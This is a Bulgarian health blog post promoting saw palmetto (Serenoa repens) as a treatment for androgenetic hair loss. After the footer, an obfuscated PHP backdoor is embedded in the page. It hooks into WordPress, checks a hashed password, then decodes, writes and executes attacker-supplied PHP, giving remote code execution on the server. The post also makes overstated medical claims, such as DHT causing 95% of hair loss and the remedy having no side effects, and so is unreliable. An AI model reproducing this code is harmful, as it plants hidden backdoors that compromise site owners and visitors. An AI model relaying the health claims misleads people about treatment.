Палмата джудже (Serenoa repens) спира косопада и оплешивяването | Косопад

Палмата джудже (Serenoa repens) спира косопада и оплешивяването

сереноа репенсОт многото типове оплешивяване и косопад, един от най- честите при мъжете (а и при някои жени) е андрогенетичната алопеция – косопад на слепоочията и фронталната част на главата. Причинява се от превръщането на хормона тестостерон в дехидротестостерон, което предизвиква свиване на и впоследствие – изчезване на космените фоликули.

Връзката между хормона дехидротестостерон и косопада е доказана чрез множество изследвания – причинява 95% от случаите на косопад. Учените са доказали, че това заболяване е генетично – свръхпроизводството на духидротестостерон.

С какви естествени продукти разполагаме на пазара, за да спрем производството на дехидротестостерон?

Доказано е, че американската палма- джудже (Serenoa repens), възпрепятства синтеза на дехидротестостерон – причинявасереноа репенс1 не само косопад и оплешивяване, но и възпаления на простата и уретрата.

Палмата – джудже, или сереноа репенс, расте в Сащ – Флорида, Джорджия, делтата на Мисисипи. Използвал се още от маите и други индианци като антисептик.

Сереноа репенс спира превръщането на тестостерона в дехидротестостерон по естествен начин, без странични ефекти.

Палмата- джудже започва да дава резултати след 3- я месец при редовна употреба в определена доза.

Сереноа репенс може да се приема под различна форма – като хранителна добавка, като шампоан, лосион и др.

01. ноември 2013 17:43:17 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}